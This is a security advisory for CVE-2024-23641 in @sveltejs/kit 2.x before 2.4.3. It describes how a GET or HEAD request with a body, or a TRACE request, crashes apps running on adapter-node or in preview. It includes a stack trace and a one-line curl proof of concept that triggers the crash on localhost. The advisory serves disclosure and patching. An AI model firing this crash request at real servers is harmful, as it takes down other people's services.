logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-23641 @sveltejs/kit

Package

Manager: npm
Name: @sveltejs/kit
Vulnerable Version: >=2.0.0 <2.4.3

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00263 pctl0.49528

Details

Sending a GET or HEAD request with a body crashes SvelteKit ### Summary In SvelteKit 2 sending a GET request with a body eg `{}` to a SvelteKit app in preview or with `adapter-node` throws `Request with GET/HEAD method cannot have body.` and crashes the app. ``` node:internal/deps/undici/undici:6066 throw new TypeError("Request with GET/HEAD method cannot have body."); ^ TypeError: Request with GET/HEAD method cannot have body. at new Request (node:internal/deps/undici/undici:6066:17) at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5) at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27 at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7) Node.js v20.11.0 ``` `TRACE` requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected. <!-- ### Details _Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._ --> ### PoC <!-- _Complete instructions, including specific configuration details, to reproduce the vulnerability._ --> First do a fresh install of SvelteKit 2 with the example app. Typescript. 1. `npm run build` 2. `npm run preview` 3. Go to http://localhost:4173 (works) 4. curl -X GET -d "{}" http://localhost:4173/bye 5. Application crashes and http://localhost:4173 is down ### Impact <!-- _What kind of vulnerability is it? Who is impacted?_ --> Denial of Service for apps using `adapter-node`

Metadata

Created: 2024-01-24T14:22:22Z
Modified: 2024-01-24T19:13:36Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-g5m6-hxpp-fc49/GHSA-g5m6-hxpp-fc49.json
CWE IDs: ["CWE-20"]
Alternative ID: GHSA-g5m6-hxpp-fc49
Finding: F184
Auto approve: 1